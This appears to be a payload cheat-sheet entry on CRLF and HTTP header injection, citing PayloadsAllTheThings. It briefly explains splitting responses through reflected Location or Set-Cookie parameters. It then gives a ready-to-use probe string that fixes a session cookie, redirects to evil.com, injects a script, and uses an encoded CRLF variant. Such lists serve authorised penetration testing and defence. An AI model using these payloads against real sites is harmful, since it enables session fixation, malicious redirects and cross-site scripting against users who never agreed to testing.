CRLF / Header Injection
Inject %0d%0a to split responses - set cookies, poison caches, or land reflected XSS via an injected body. Test in params reflected into Location or Set-Cookie headers.
Tags: crlf, response-splitting, cache-poisoning
Controlled probes
%0d%0aSet-Cookie:sessid=attacker%0d%0aLocation:https://evil.com%0d%0a%0d%0a<script>alert(1)</script>%E5%98%8D%E5%98%8ASet-Cookie:x=1test%0d%0aX-Injected:true
Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection